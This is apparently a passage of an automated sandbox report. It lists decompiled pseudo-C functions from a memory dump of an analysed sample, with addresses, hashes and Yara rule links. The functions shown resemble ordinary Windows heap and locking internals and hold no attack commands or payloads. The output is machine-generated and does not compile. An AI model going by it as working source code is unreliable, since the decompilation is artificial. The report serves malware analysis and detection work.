                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E01863D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x18ad360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E017D2280(_t34, 0x18a8a6c);
				_t64 =  *0x18a5768; // 0x77e15768
				if(_t64 != 0x18a5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77e15770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E017CFFB0(_t53, _t64, 0x18a8a6c);
						 *0x18ab1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E017D2280(_t45, 0x18a8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x18a5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E017CFFB0(_t51, _t64, 0x18a8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E017FB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                    0x01863d40
                                                    0x01863d48
                                                    0x01863d52
                                                    0x01863d59
                                                    0x01863d5d
                                                    0x01863d61
                                                    0x01863d63
                                                    0x01863d67
                                                    0x01863d69
                                                    0x01863d72
                                                    0x01863d76
                                                    0x01863d7a
                                                    0x01863d7f
                                                    0x01863d8b
                                                    0x01863d91
                                                    0x01863d91
                                                    0x01863d91
                                                    0x01863d94
                                                    0x01863d96
                                                    0x01863d9d
                                                    0x01863da1
                                                    0x01863db0
                                                    0x01863dba
                                                    0x01863dbc
                                                    0x01863dbc
                                                    0x01863dc6
                                                    0x01863dcb
                                                    0x01863dcf
                                                    0x01863dd1
                                                    0x01863dd4
                                                    0x00000000
                                                    0x00000000
                                                    0x01863dd9
                                                    0x01863e0c
                                                    0x01863e0c
                                                    0x01863e0f
                                                    0x01863ddb
                                                    0x01863ddb
                                                    0x01863de0
                                                    0x00000000
                                                    0x01863de2
                                                    0x01863de2
                                                    0x01863de4
                                                    0x01863de8
                                                    0x01863deb
                                                    0x01863df1
                                                    0x00000000
                                                    0x01863df3
                                                    0x01863df3
                                                    0x01863df5
                                                    0x01863df8
                                                    0x01863dfa
                                                    0x00000000
                                                    0x01863dfa
                                                    0x01863df1
                                                    0x01863de0
                                                    0x01863e11
                                                    0x01863e11
                                                    0x00000000
                                                    0x01863dfe
                                                    0x01863e04
                                                    0x01863e06
                                                    0x00000000
                                                    0x01863e06
                                                    0x00000000
                                                    0x01863e04
                                                    0x01863d91
                                                    0x01863e15
                                                    0x01863e1a
                                                    0x01863e1f
                                                    0x01863e1f
                                                    0x01863e23
                                                    0x01863e29
                                                    0x00000000
                                                    0x00000000
                                                    0x01863e2e
                                                    0x00000000
                                                    0x01863e30
                                                    0x01863e30
                                                    0x01863e35
                                                    0x00000000
                                                    0x01863e37
                                                    0x01863e3e
                                                    0x01863e42
                                                    0x01863e48
                                                    0x01863e4e
                                                    0x00000000
                                                    0x01863e4e
                                                    0x01863e35
                                                    0x00000000
                                                    0x01863e2e
                                                    0x01863e5b
                                                    0x01863e5c
                                                    0x01863e5d
                                                    0x01863e68
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e426f6885f87d60ad875b0a063d2b71dda6bcdb66a502728320918ba20d602f
                                                    • Instruction ID: 5c6692984878c9b0d4cf77a140635f1858fde29eada87ebb83435f90269ff5b3
                                                    • Opcode Fuzzy Hash: 1e426f6885f87d60ad875b0a063d2b71dda6bcdb66a502728320918ba20d602f
                                                    • Instruction Fuzzy Hash: 9D317771A09302DFC711DF18C98491AFBE9FF85714F45496EE888DB645D730EA04CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EA70E Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E017EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x18a7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x18a7b10 = 8;
					 *0x18a7b14 = 0x18a7b0c;
					 *0x18a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E017EA990(0x18a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L017EA840(__edx, __ecx, __ecx, _t52, 0x18a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x18a7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x18a7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x18a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L017D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x18a7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E017FF3E0(_t50,  *0x18a7b14, _t8 >> 3);
						_t28 =  *0x18a7b14; // 0x0
						__eflags = _t28 - 0x18a7b0c;
						if(_t28 != 0x18a7b0c) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x18a7b14 = _t50;
						_t48 = _v12;
						 *0x18a7b10 = _t9;
						goto L6;
					}
					 *0x18a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                    0x017ea713
                                                    0x017ea714
                                                    0x017ea717
                                                    0x017ea71d
                                                    0x017ea720
                                                    0x017ea722
                                                    0x017ea727
                                                    0x017ea74a
                                                    0x017ea754
                                                    0x017ea75e
                                                    0x017ea768
                                                    0x017ea76a
                                                    0x017ea773
                                                    0x017ea78b
                                                    0x017ea790
                                                    0x017ea792
                                                    0x017ea741
                                                    0x017ea741
                                                    0x017ea743
                                                    0x017ea749
                                                    0x017ea749
                                                    0x017ea732
                                                    0x017ea73a
                                                    0x017ea797
                                                    0x017ea79d
                                                    0x017ea7a3
                                                    0x017ea7a9
                                                    0x017ea7b6
                                                    0x017ea7bc
                                                    0x017ea7ca
                                                    0x017ea7e0
                                                    0x017ea7e2
                                                    0x017ea7e4
                                                    0x01829bf2
                                                    0x00000000
                                                    0x01829bf2
                                                    0x017ea7ed
                                                    0x017ea7f2
                                                    0x017ea800
                                                    0x017ea805
                                                    0x017ea80d
                                                    0x017ea812
                                                    0x01829c08
                                                    0x01829c08
                                                    0x017ea818
                                                    0x017ea81b
                                                    0x017ea821
                                                    0x017ea824
                                                    0x00000000
                                                    0x017ea824
                                                    0x017ea7ae
                                                    0x00000000
                                                    0x017ea7ae
                                                    0x017ea73c
                                                    0x017ea73e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d74fdfd98bd849b65460b0924d814b8a249a06c3d881cd51ea6c0fc722b75445
                                                    • Instruction ID: 28b8ff3d4dd0b2e9f05ffcf2cf662321dda96a9c8904bbec374c1830328e2e1e
                                                    • Opcode Fuzzy Hash: d74fdfd98bd849b65460b0924d814b8a249a06c3d881cd51ea6c0fc722b75445
                                                    • Instruction Fuzzy Hash: 3E31CDF16402059FE721CB18D884F69BBF9FB88710F94099AE206C7248D772AA02DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E61A0 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E017E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E017E5E50(0x17967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01889D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E017BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                    0x017e61b3
                                                    0x017e61b5
                                                    0x017e61bd
                                                    0x017e61c3
                                                    0x017e61c7
                                                    0x017e61d2
                                                    0x017e61ff
                                                    0x017e61ff
                                                    0x017e6201
                                                    0x017e6207
                                                    0x017e6207
                                                    0x017e61d4
                                                    0x017e61d9
                                                    0x00000000
                                                    0x00000000
                                                    0x017e61df
                                                    0x017e61e2
                                                    0x00000000
                                                    0x00000000
                                                    0x017e61e6
                                                    0x017e61e8
                                                    0x017e61ee
                                                    0x017e61ee
                                                    0x017e61f9
                                                    0x0182762f
                                                    0x01827632
                                                    0x01827635
                                                    0x01827639
                                                    0x01827640
                                                    0x0182766e
                                                    0x01827675
                                                    0x00000000
                                                    0x00000000
                                                    0x01827681
                                                    0x01827689
                                                    0x0182768d
                                                    0x01827691
                                                    0x01827695
                                                    0x01827699
                                                    0x018276af
                                                    0x018276b5
                                                    0x018276b7
                                                    0x018276b7
                                                    0x018276d7
                                                    0x018276dc
                                                    0x00000000
                                                    0x018276dc
                                                    0x018276a2
                                                    0x018276a9
                                                    0x01827651
                                                    0x01827653
                                                    0x01827653
                                                    0x01827656
                                                    0x01827656
                                                    0x00000000
                                                    0x01827656
                                                    0x01827644
                                                    0x01827646
                                                    0x01827648
                                                    0x01827648
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4987ecc3c50a588622c1339d4685d5744340b2a30344250966e002c18ae7a0e8
                                                    • Instruction ID: a18b69e6be912c3db125ae5e30284c67b856ce57eeb3ff1fba9f32f9ff7702df
                                                    • Opcode Fuzzy Hash: 4987ecc3c50a588622c1339d4685d5744340b2a30344250966e002c18ae7a0e8
                                                    • Instruction Fuzzy Hash: E33169716093518FE361CF0EC804B26FBE4ABA8B04F04496DFA98DB251E770E9448B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BAA16 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E017BAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x18ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x18a7b9c; // 0x0
					_t53 = L017D4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E017FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E017FF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L017C6C59(_t53, _t51, _t58) != 0) {
							_t28 = E017E5E50(0x179c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E017EB230(_v32, _v28, 0x179c2d8, 1,  &_v24);
								_t28 = E017BF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                    0x017baa25
                                                    0x017baa29
                                                    0x017baa2d
                                                    0x017baa30
                                                    0x017baa37
                                                    0x017baa3c
                                                    0x01814458
                                                    0x01814458
                                                    0x01814472
                                                    0x01814474
                                                    0x01814476
                                                    0x017baa64
                                                    0x017baa74
                                                    0x0181447c
                                                    0x01814483
                                                    0x01814492
                                                    0x017baa52
                                                    0x017baa54
                                                    0x017baa5e
                                                    0x018144a8
                                                    0x018144ad
                                                    0x018144af
                                                    0x018144b6
                                                    0x018144b6
                                                    0x018144b9
                                                    0x018144bc
                                                    0x018144cd
                                                    0x018144d3
                                                    0x018144d6
                                                    0x018144e1
                                                    0x018144e1
                                                    0x018144e6
                                                    0x018144e8
                                                    0x018144fb
                                                    0x018144fb
                                                    0x018144e8
                                                    0x00000000
                                                    0x017baa5e
                                                    0x01814476
                                                    0x017baa42
                                                    0x017baa46
                                                    0x017baa48
                                                    0x017baa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1df14e7392ee3cecfb7e1d63ceffc50c5782bbe79e57984874bb7a6c277c2457
                                                    • Instruction ID: 48f1bee72e4228f34747009f2987d27fc844f41d537f2147c932153bface9983
                                                    • Opcode Fuzzy Hash: 1df14e7392ee3cecfb7e1d63ceffc50c5782bbe79e57984874bb7a6c277c2457
                                                    • Instruction Fuzzy Hash: 6831D772A0011AABDF11AF68CD85ABFF7B8EF04700F414469F901EB244E7749A11DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F4A2C Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E017F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x18ad360 ^ _t62;
				_v8 =  *0x18ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E017D2280(_t26, 0x18a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E017CFFB0(_t41, _t51, 0x18a8608);
						L2:
						 *0x18ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E017FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E017D2280(_t28, 0x18a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E017CFFB0(_t42, _t53, 0x18a8608);
							if(_t53 != 0) {
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E017CFFB0(_t41, _t51, 0x18a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                    0x017f4a2c
                                                    0x017f4a34
                                                    0x017f4a3c
                                                    0x017f4a3e
                                                    0x017f4a48
                                                    0x017f4a4b
                                                    0x017f4a4d
                                                    0x017f4a51
                                                    0x017f4a9c
                                                    0x00000000
                                                    0x00000000
                                                    0x017f4aa3
                                                    0x017f4aa8
                                                    0x017f4aad
                                                    0x017f4ab1
                                                    0x017f4ade
                                                    0x017f4ae3
                                                    0x017f4a5a
                                                    0x017f4a62
                                                    0x017f4a6a
                                                    0x017f4a6e
                                                    0x0182f203
                                                    0x017f4a84
                                                    0x017f4a88
                                                    0x017f4a89
                                                    0x017f4a8a
                                                    0x017f4a95
                                                    0x017f4a95
                                                    0x017f4a79
                                                    0x017f4a80
                                                    0x017f4af2
                                                    0x017f4af4
                                                    0x017f4af9
                                                    0x017f4aff
                                                    0x017f4b01
                                                    0x017f4b03
                                                    0x017f4b08
                                                    0x0182f20a
                                                    0x0182f212
                                                    0x0182f216
                                                    0x0182f216
                                                    0x017f4b08
                                                    0x017f4b13
                                                    0x017f4b1a
                                                    0x0182f229
                                                    0x0182f229
                                                    0x017f4b1a
                                                    0x017f4a82
                                                    0x00000000
                                                    0x017f4a82
                                                    0x017f4ab7
                                                    0x017f4acd
                                                    0x017f4acd
                                                    0x017f4ad5
                                                    0x017f4ada
                                                    0x00000000
                                                    0x017f4ada
                                                    0x017f4ac2
                                                    0x017f4acb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017f4acb
                                                    0x017f4a53
                                                    0x017f4a53
                                                    0x017f4a58
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03851fd197e73955019057b2875c1f539f1c31b899cb33897ed136bbe25678bb
                                                    • Instruction ID: f7d753495b8e2d37458ebccc6aa3052c4ea8f2612e59cfda23aeaf4443363ae2
                                                    • Opcode Fuzzy Hash: 03851fd197e73955019057b2875c1f539f1c31b899cb33897ed136bbe25678bb
                                                    • Instruction Fuzzy Hash: AB3144322053119BE7229F18C988B2BFBB4FF82B10F44446DEA1387745CB74EA48CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F8EC7 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E017F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x18ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E017E4E70(0x18a86e4, 0x17f9490, 0, 0);
					if( *0x18a53e8 > 5 && E017F8F33(0x18a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x18a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x18a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x179bc46;
						_t48 = E01837B9C(0x18a53e8, 0x179bc46, _t67, 0x18a53e8, _t70,  &_v140);
					}
				}
				return E017FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                    0x017f8ec7
                                                    0x017f8ed9
                                                    0x017f8edc
                                                    0x017f8ee6
                                                    0x017f8ee9
                                                    0x017f8eee
                                                    0x017f8efc
                                                    0x017f8f08
                                                    0x01831349
                                                    0x01831353
                                                    0x0183135d
                                                    0x01831366
                                                    0x0183136f
                                                    0x01831375
                                                    0x0183137c
                                                    0x01831385
                                                    0x01831390
                                                    0x01831391
                                                    0x0183139c
                                                    0x0183139d
                                                    0x018313a6
                                                    0x018313ac
                                                    0x018313b2
                                                    0x018313b5
                                                    0x018313bc
                                                    0x018313bf
                                                    0x018313c2
                                                    0x018313c5
                                                    0x018313c8
                                                    0x018313cb
                                                    0x018313ce
                                                    0x018313d1
                                                    0x018313d4
                                                    0x018313d7
                                                    0x018313da
                                                    0x018313dd
                                                    0x018313e0
                                                    0x018313e3
                                                    0x018313e6
                                                    0x018313e9
                                                    0x018313f6
                                                    0x01831400
                                                    0x01831400
                                                    0x017f8f08
                                                    0x017f8f32

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57f68b5c8f83f4f0ce0060c121584a7cdad8916433667c9bdbaaca71eeef2a57
                                                    • Instruction ID: 2be5c5da6e0892b89e1c38337b334e0ff1eaff6a163857c079efcacc381379fe
                                                    • Opcode Fuzzy Hash: 57f68b5c8f83f4f0ce0060c121584a7cdad8916433667c9bdbaaca71eeef2a57
                                                    • Instruction Fuzzy Hash: 1D4181B1D002189FDB24CFAAD981AAEFBF4FB49710F5041AEE609E7240E7745A84CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EE730 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E017EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E017F9670() < 0) {
					L0180DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
